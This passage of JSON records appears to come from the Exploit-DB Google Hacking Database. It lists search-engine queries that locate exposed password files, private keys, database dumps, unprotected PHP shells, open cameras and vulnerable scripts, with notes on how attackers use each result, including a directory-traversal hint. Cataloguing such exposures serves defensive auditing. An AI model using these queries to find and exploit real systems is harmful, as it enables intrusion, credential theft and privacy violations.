        "textualDescription": "Everyone has this problem, we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database..An attacker can find and download those mdb files easily with Google. This search tries to find such \"user\" databases. Some are password protected, many are not. Weee!"
    }, 
    {
        "signatureReferenceNumber": "287", 
        "link": "https://www.exploit-db.com/ghdb/287/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=intitle:%22Error+using+Hypernews%22+%22Server+Software%22&num=100&hl=en&lr=&ie=UTF-8&safe=off&filter=0", 
        "shortDescription": "intitle:\"Error using Hypernews\" \"Server Software\"", 
        "textualDescription": "HyperNews is a cross between the WWW and Usenet News. Readers can browse through the messages written by other people and reply to those messages. This search reveals the server software, server os, server account user:group (unix), and the server administrator email address. Many of these messages also include a traceback of the files and linenumbers and a listing of the cgi ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files."
    }, 
    {
        "signatureReferenceNumber": "288", 
        "link": "https://www.exploit-db.com/ghdb/288/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.de/search?hl=de&ie=ISO-8859-1&q=filetype%3Acfg+ks+intext%3Arootpw+-sample+-test+-howto&meta=", 
        "shortDescription": "filetype:cfg ks intext:rootpw -sample -test -howto", 
        "textualDescription": "Anaconda is a linux configuration tool like yast on suse linux. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.There are more ks configs then you might expect and with a bit of searching through the result list an attacker can find the root password and own that system."
    }, 
    {
        "signatureReferenceNumber": "289", 
        "link": "https://www.exploit-db.com/ghdb/289/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aphp+inurl%3A%22viewfile%22+-%22index.php%22+-%22idfil&btnG=Google+Search", 
        "shortDescription": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", 
        "textualDescription": "Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --> will show you the my_howto.txt).An attacker can check for buggy php scripts wich allow you to view any file on the system (with webservers permissions). Try the good, old directory traversal trick: \"../../../\". You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?)."
    }, 
    {
        "signatureReferenceNumber": "290", 
        "link": "https://www.exploit-db.com/ghdb/290/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=active&q=allinurl%3A%22.nsconfig%22+-sa", 
        "shortDescription": "allinurl:\".nsconfig\" -sample -howto -tutorial", 
        "textualDescription": "Access to a Web server's content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content)."
    }, 
    {
        "signatureReferenceNumber": "291", 
        "link": "https://www.exploit-db.com/ghdb/291/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=active&q=inurl%3A%22exchange%2Flogon.asp%22+OR+intitle%3A%22Microsoft+Outlook+Web+Access+-+Logon%22&btnG=Search", 
        "shortDescription": "Outlook Web Access (a better way)", 
        "textualDescription": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad."
    }, 
    {
        "signatureReferenceNumber": "292", 
        "link": "https://www.exploit-db.com/ghdb/292/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?q=inurl:root.asp%3Facs%3Danon&num=100&hl=en&lr=&ie=UTF-8&safe=off&output=search", 
        "shortDescription": "OWA Public folders & Address book", 
        "textualDescription": "This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.An attacker can use the addressbook to  enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation."
    }, 
    {
        "signatureReferenceNumber": "293", 
        "link": "https://www.exploit-db.com/ghdb/293/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Looking+Glass%22+%28inurl%3A%22lg%2F%22+%7C+inurl%3Alookingglass%29+&btnG=Search", 
        "shortDescription": "Looking Glass", 
        "textualDescription": "A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.An attacker use this to gather information about the network."
    }, 
    {
        "signatureReferenceNumber": "294", 
        "link": "https://www.exploit-db.com/ghdb/294/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Acgi+inurl%3A%22irc.cgi%22+%7C+intitle%3A%22CGI%3AIRC+Login%22+&btnG=Google+Search", 
        "shortDescription": "CGI:IRC Login", 
        "textualDescription": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else."
    }, 
    {
        "signatureReferenceNumber": "295", 
        "link": "https://www.exploit-db.com/ghdb/295/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Actt+ctt+messenger&btnG=Search", 
        "shortDescription": "filetype:ctt ctt messenger", 
        "textualDescription": "MSN Messenger uses the file extension *.ctt when you export the contact list. An attacker could use this for social enginering tricks."
    }, 
    {
        "signatureReferenceNumber": "296", 
        "link": "https://www.exploit-db.com/ghdb/296/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Error+Occurred+While+Processing+Request%22+%2BWHERE+%28SELECT%7CINSERT%29+filetype%3Acfm&btnG=Search", 
        "shortDescription": "intitle:\"Error Occurred While Processing Request\" +WHERE (SELECT|INSERT) filetype:cfm", 
        "textualDescription": "Cold fusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver.An attacker could use this information to quickly find SQL injection points."
    }, 
    {
        "signatureReferenceNumber": "297", 
        "link": "https://www.exploit-db.com/ghdb/297/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22htsearch+error%22+ht%3A%2F%2FDig+error&btnG=Search", 
        "shortDescription": "ht://Dig htsearch error", 
        "textualDescription": "The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publically available sites that use ht://Dig is available at http://www.htdig.org/uses.htmlht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system. If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions."
    }, 
    {
        "signatureReferenceNumber": "298", 
        "link": "https://www.exploit-db.com/ghdb/298/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aasp+inurl%3A%22shopdisplayproducts.asp%22&btnG=Google+Search", 
        "shortDescription": "VP-ASP Shopping Cart XSS", 
        "textualDescription": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:\"VP-ASP Shopping Cart *\" -\"5.0\" to find unpatched servers."
    }, 
    {
        "signatureReferenceNumber": "299", 
        "link": "https://www.exploit-db.com/ghdb/299/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+inurl%3Aunrealircd.conf+-cvs+-gentoo&btnG=Search", 
        "shortDescription": "Unreal IRCd", 
        "textualDescription": "Development of UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).This search finds configuration files to Unreal IRCd. An attacker can use these to possibly determine the oper passwd. Be warned that there are samples in the results."
    }, 
    {
        "signatureReferenceNumber": "300", 
        "link": "https://www.exploit-db.com/ghdb/300/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Fpublic%2F%3FCmd%3Dcontents&btnG=Search", 
        "shortDescription": "OWA Public Folders (direct view)", 
        "textualDescription": "This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different, it just depends which link Google has crawled.An attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social enginering tricks."
    }, 
    {
        "signatureReferenceNumber": "301", 
        "link": "https://www.exploit-db.com/ghdb/301/", 
        "category": "Sensitive Online Shopping Info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&&q=inurl%3A%22shopadmin.asp%22+%22Shop+Administrators+only%22", 
        "shortDescription": "VP-ASP Shop Administrators only", 
        "textualDescription": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQJ injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html"
    }, 
    {
        "signatureReferenceNumber": "302", 
        "link": "https://www.exploit-db.com/ghdb/302/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=%3Cfiletype:mny+mny%3E&hl=en&lr=&ie=UTF-8&safe=off&filter=0", 
        "shortDescription": "Microsoft Money Data Files", 
        "textualDescription": "Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny.A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called \"Passware\"."
    }, 
    {
        "signatureReferenceNumber": "303", 
        "link": "https://www.exploit-db.com/ghdb/303/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=HTTP_USER_AGENT=Googlebot&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "Environment vars", 
        "textualDescription": "This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow to things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc."
    }, 
    {
        "signatureReferenceNumber": "304", 
        "link": "https://www.exploit-db.com/ghdb/304/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22%23+Dumping+data+for+table+%28username%7Cuser%7Cusers%7Cpassword%29%22+-site%3Amysql.com+-cvs&btnG=Search", 
        "shortDescription": "MySQL tabledata dumps", 
        "textualDescription": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper..... Note: this is a cleanup version of an older googledork entry."
    }, 
    {
        "signatureReferenceNumber": "305", 
        "link": "https://www.exploit-db.com/ghdb/305/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Welcome+to+ntop%21%22&btnG=Search", 
        "shortDescription": "Welcome to ntop!", 
        "textualDescription": "Ntop shows the current network usage. It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host. An attacker may use this to gather information about hosts and services behind the firewall."
    }, 
    {
        "signatureReferenceNumber": "306", 
        "link": "https://www.exploit-db.com/ghdb/306/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+by%3A+vBulletin+*+3.0.1%22+inurl%3Anewreply.php&btnG=Search", 
        "shortDescription": "vBulletin version 3.0.1 newreply.php XSS", 
        "textualDescription": "vBulletin is a customizable forums package for web sites. It has been written in PHP and is complimented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not Edit-panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/."
    }, 
    {
        "signatureReferenceNumber": "307", 
        "link": "https://www.exploit-db.com/ghdb/307/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+inurl%3Apsybnc.conf++%22USER.PASS%3D%22&btnG=Search", 
        "shortDescription": "psyBNC config files", 
        "textualDescription": "psyBNC is an IRC-Bouncer with many features. It compiles on Linux, FreeBSD, SunOs and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).An attacker can use the password, host and portinformation in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy irc hostname that are usually linked to those IP addresses."
    }, 
    {
        "signatureReferenceNumber": "308", 
        "link": "https://www.exploit-db.com/ghdb/308/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22View+and+Configure+PhaserLink%22&btnG=Search", 
        "shortDescription": "intitle:\"View and Configure PhaserLink\"", 
        "textualDescription": "These printer's configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! =)"
    }, 
    {
        "signatureReferenceNumber": "309", 
        "link": "https://www.exploit-db.com/ghdb/309/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intext%3A%22Warning%3A+Failed+opening%22+%22on+line%22+%22include_path%22", 
        "shortDescription": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", 
        "textualDescription": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths."
    }, 
    {
        "signatureReferenceNumber": "310", 
        "link": "https://www.exploit-db.com/ghdb/310/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Aphp+inurl%3A%22webeditor.php%22", 
        "shortDescription": "filetype:php inurl:\"webeditor.php\"", 
        "textualDescription": "This is a standard login portal for the webadmin program."
    }, 
    {
        "signatureReferenceNumber": "311", 
        "link": "https://www.exploit-db.com/ghdb/311/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3A%22ViewerFrame%3FMode%3D%22&btnG=Google+Search", 
        "shortDescription": "Panasonic Network Cameras", 
        "textualDescription": "Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to   keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/There is a htaccess protected admin page at \"http://[target-ip]/config.html\" on the target device. Admin logins have no defaults, but created during setup."
    }, 
    {
        "signatureReferenceNumber": "312", 
        "link": "https://www.exploit-db.com/ghdb/312/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Asnc-rz30+inurl%3Ahome%2F+&btnG=Search", 
        "shortDescription": "sony SNC-RZ30 Network Cameras", 
        "textualDescription": "sony NC RZ30 camera's require a java capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html."
    }, 
    {
        "signatureReferenceNumber": "313", 
        "link": "https://www.exploit-db.com/ghdb/313/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Aflexwatch+intext%3A%22Home+page+ver%22&btnG=Search", 
        "shortDescription": "seyeon FlexWATCH cameras", 
        "textualDescription": "seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCH\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 Network video server series has built-in Web server based on TCP/IP technology. It also has an embedded RTOS.The admin pages are at http://[sitename]/admin/aindex.htm."
    }, 
    {
        "signatureReferenceNumber": "314", 
        "link": "https://www.exploit-db.com/ghdb/314/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3Asnc-z20+inurl%3Ahome%2F+&btnG=Google+Search", 
        "shortDescription": "sony SNC-RZ20 network cameras", 
        "textualDescription": "sony NC RZ20 cameras, only one result for this cam at the moment, a nice street view from a skyscraper."
    }, 
    {
        "signatureReferenceNumber": "315", 
        "link": "https://www.exploit-db.com/ghdb/315/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=%28intext%3A%22MOBOTIX+M1%22+%7C+intext%3A%22MOBOTIX+M10%22%29+intext%3A%22Open+Menu%22+Shift-Reload&btnG=Search", 
        "shortDescription": "Mobotix netcams", 
        "textualDescription": "Mobotix netcams use the thttpd-2.x. server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality.Moderator note: this search was found by L0om and cleaned up by Wolveso."
    }, 
    {
        "signatureReferenceNumber": "316", 
        "link": "https://www.exploit-db.com/ghdb/316/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22WJ-NT104+Main+Page%22&btnG=Search", 
        "shortDescription": "Panasonic WJ-NT104 netcams", 
        "textualDescription": "The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp"
    }, 
    {
        "signatureReferenceNumber": "317", 
        "link": "https://www.exploit-db.com/ghdb/317/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=e-mail+address+filetype%3Acsv+csv", 
        "shortDescription": "exported email addresses", 
        "textualDescription": "Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation."
    }, 
    {
        "signatureReferenceNumber": "318", 
        "link": "https://www.exploit-db.com/ghdb/318/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&q=filetype%3Aphp+login+%28intitle%3AphpWebMail%7CWebMail%29&btnG=Search", 
        "shortDescription": "phpWebMail", 
        "textualDescription": "PhpWebMail is a php webmail system that supports imap or pop3.    It has been reported that PHPwebmail 2.3 is vulnerable. The vulnerability allows phpwebmail users to gain access to arbitrary file system by changing the parameters in the URL used for sending mail (send_mail.php). More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html."
    }, 
    {
        "signatureReferenceNumber": "319", 
        "link": "https://www.exploit-db.com/ghdb/319/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22Powered+by+Invision+Power+Board%28U%29+v1.3+Final%22&btnG=Search", 
        "shortDescription": "Invision Power Board SSI.PHP SQL Injection", 
        "textualDescription": "Invision Power Board is reported prone to an SQL injection vulnerability in its ssi.php script. Due to improper filtering of user supplied data, ssi.php is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.More info: http://www.securityfocus.com/bid/10511/info/"
    }, 
    {
        "signatureReferenceNumber": "320", 
        "link": "https://www.exploit-db.com/ghdb/320/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=ACID+%22by+Roman+Danyliw%22+filetype%3Aphp&btnG=Search", 
        "shortDescription": "Analysis Console for Incident Databases", 
        "textualDescription": "ACID stands for for \"Analysis Console for Incident Databases\". It is a php frontend for the snort intrusion detection system database.These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, ip addresses, network layout, existance of firewall and IDS systems, and more."
    }, 
    {
        "signatureReferenceNumber": "321", 
        "link": "https://www.exploit-db.com/ghdb/321/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22index+of+%2Fphpmyadm", 
        "shortDescription": "Index of phpMyAdmin", 
        "textualDescription": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields (http://sourceforge.net/projects/phpmyadmin/).An attacker can use this search to find phpMyAdmin enabled MySQL servers by using the \"index of /\" method. Consider this an alternative way an attacker could find them besides the older Googledorks for phpMyAdmin."
    }, 
    {
        "signatureReferenceNumber": "322", 
        "link": "https://www.exploit-db.com/ghdb/322/", 
        "category": "Sensitive Online Shopping Info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22%2Fdatabase%2Fcomersus.mdb%22&btnG=Search", 
        "shortDescription": "Comersus.mdb database", 
        "textualDescription": "Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&-click interface.This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well know security sites for Comersus reveals more security problems."
    }, 
    {
        "signatureReferenceNumber": "323", 
        "link": "https://www.exploit-db.com/ghdb/323/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+by+PHPFM%22+filetype%3Aphp+-username&btnG=Search", 
        "shortDescription": "Public PHP FileManagers", 
        "textualDescription": "PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user. The built-in login system makes sure that only people with the right username and password gains access to PHPFM, however, you can also choose to disable the login system and use PHPFM for public access. It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages. This search finds those \"public\" versions of PHPFM. An attacker can use them to manage his own files (phpshell anyone ?).PS: thanks to j0hnny for the public access angle :)"
    }, 
    {
        "signatureReferenceNumber": "324", 
        "link": "https://www.exploit-db.com/ghdb/324/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Akey&btnG=Search", 
        "shortDescription": "private key files (.key)", 
        "textualDescription": "This search will find private key files... Private key files are supposed to be, well... private."
    }, 
    {
        "signatureReferenceNumber": "325", 
        "link": "https://www.exploit-db.com/ghdb/325/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Aexplorer.cfm+inurl%3A%28dirpath%7CThis_Directory%29&btnG=Search", 
        "shortDescription": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", 
        "textualDescription": "Filemanager without authentication."
    }, 
    {
        "signatureReferenceNumber": "326", 
        "link": "https://www.exploit-db.com/ghdb/326/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Acsr&btnG=Search", 
        "shortDescription": "private key files (.csr)", 
        "textualDescription": "This search will find private key files... Private key files are supposed to be, well... private."
    }, 
    {
        "signatureReferenceNumber": "327", 
        "link": "https://www.exploit-db.com/ghdb/327/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22PHP+Shell+*%22+%22Enable+stderr%22+filetype%3Aphp&btnG=Search", 
        "shortDescription": "PHP Shell (unprotected)", 
        "textualDescription": "PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbiritary shell-commands or browse the filesystem on your remote Web server. This replaces, to a degree, a normal telnet-connection. You can use it for administration and maintenance of your Web site using commands like ps, free, du, df, and more.If these shells aren't protected by some form of authentication, an attacker will basicly *own* the server. This search finds such unprotected phpshells by looking for the keyword \"enable stderr\"."
    }, 
    {
        "signatureReferenceNumber": "328", 
        "link": "https://www.exploit-db.com/ghdb/328/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Your+password+is+*+Remember+this+for+later+use%22", 
        "shortDescription": "NickServ registration passwords", 
        "textualDescription": "NickServ allows you to \"register\" a nickname (on some IRC networks) and prevent others from using it. Some channels also require you to use a registered nickname to join.This search contains the the nickserv response message to a nick registration. Lots of example sites, but some that aren't... you can see which ones are fake or not in the search (some are like, your_password, while other are more realistic ones)."
    }, 
    {
        "signatureReferenceNumber": "329", 
        "link": "https://www.exploit-db.com/ghdb/329/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Page+rev+*%2F*%2F*%22+inurl%3A%22admin&btnG=Search", 
        "shortDescription": "Red Hat Unix Administration", 
        "textualDescription": "Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server."
    }, 
    {
        "signatureReferenceNumber": "330", 
        "link": "https://www.exploit-db.com/ghdb/330/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Assl%2Econf+filetype%3Aconf", 
        "shortDescription": "inurl:ssl.conf filetype:conf", 
        "textualDescription": "The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways."
    }, 
    {
        "signatureReferenceNumber": "331", 
        "link": "https://www.exploit-db.com/ghdb/331/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&q=PHP+application+warnings+failing+%22include_path%22", 
        "shortDescription": "PHP application warnings failing \"include_path\"", 
        "textualDescription": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006)."
    }, 
    {
        "signatureReferenceNumber": "332", 
        "link": "https://www.exploit-db.com/ghdb/332/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Internal+Server+Error%22+%22server+at%22", 
        "shortDescription": "\"Internal Server Error\" \"server at\"", 
        "textualDescription": "We have a similar search already, but it relies on \"500 Internal Server\" which doesn't appear on all errors like this one. It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code."
    }, 
    {
        "signatureReferenceNumber": "333", 
        "link": "https://www.exploit-db.com/ghdb/333/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3Alilo.conf+filetype%3Aconf+password+-tatercounter2000+-bootpwd+-man&btnG=Google+Search", 
        "shortDescription": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", 
        "textualDescription": "LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed. Please note that all searches for configuration files will contain at least some false positives."
    }, 
    {
        "signatureReferenceNumber": "334", 
        "link": "https://www.exploit-db.com/ghdb/334/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aphp+inurl%3A%22logging.php%22+%22Discuz%22+error&btnG=Search", 
        "shortDescription": "filetype:php inurl:\"logging.php\" \"Discuz\" error", 
        "textualDescription": "Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements)."
    }, 
    {
        "signatureReferenceNumber": "335", 
        "link": "https://www.exploit-db.com/ghdb/335/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3A%22Microsoft+Site+Server+Analysis%22&btnG=Google+Search", 
        "shortDescription": "intitle:\"Microsoft Site Server Analysis\"", 
        "textualDescription": "Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however. An attacker may use these reports to gather information about the directory structure and possibly identify script files."
    }, 
    {
        "signatureReferenceNumber": "336", 
        "link": "https://www.exploit-db.com/ghdb/336/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of%22+passwords+modified&btnG=Search", 
